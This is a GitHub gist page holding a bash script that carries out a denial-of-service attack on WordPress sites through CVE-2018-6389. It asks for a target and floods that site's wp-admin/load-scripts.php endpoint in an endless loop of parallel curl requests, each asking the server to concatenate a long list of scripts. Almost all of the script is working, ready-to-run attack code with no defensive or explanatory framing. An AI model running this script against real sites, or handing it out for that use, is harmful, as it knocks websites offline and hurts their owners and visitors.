Skip to content

Instantly share code, notes, and snippets.

@andripwn
Created February 8, 2020 20:47
Show Gist options
  • Save andripwn/175dd5890320c5e19ed9175ae2d1ae7f to your computer and use it in GitHub Desktop.
Save andripwn/175dd5890320c5e19ed9175ae2d1ae7f to your computer and use it in GitHub Desktop.
CVE-2018-6389 Service Attack
#!/bin/bash
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
LIMITATOR=20
clear
BANNERS () {
printf "${white}
██████╗ ██╗ ██╗███╗ ██╗ ██████╗ ███████╗███████╗ ██████╗
██╔══██╗██║ ██║████╗ ██║██╔═████╗██╔════╝██╔════╝██╔════╝
██████╔╝██║ █╗ ██║██╔██╗ ██║██║██╔██║███████╗█████╗ ██║
██╔═══╝ ██║███╗██║██║╚██╗██║████╔╝██║╚════██║██╔══╝ ██║
██║ ╚███╔███╔╝██║ ╚████║╚██████╔╝███████║███████╗╚██████╗
╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝╚══════╝ ╚═════╝
${lightgreen}Wordpress Dos Attack - Pwn0Sec
CVE-2018-6389
"
}
BANNERS
OPTIONS () {
printf "${lightgreen}[>]${white} TARGET :${lightgreen} "
read list
}
OPTIONS
function ddos(){
if [[ $(curl -kLs "${1}/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter" ) =~ 'window' ]]; then
printf "${lightgreen}[+] Attacking ${white} ${list} ${lightgreen} Success \n"
else
printf "${red}[-]Failed Attack ${white} ${list} Maybe Down Or Not Vuln\n"
fi
}
printf "\n \n${lightgreen}############## START ATTACKING ##############${white}\n"
while :
do
((cthread=cthread%LIMITATOR)); ((cthread++==0)) && wait
ddos "${list}" &
done
wait
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment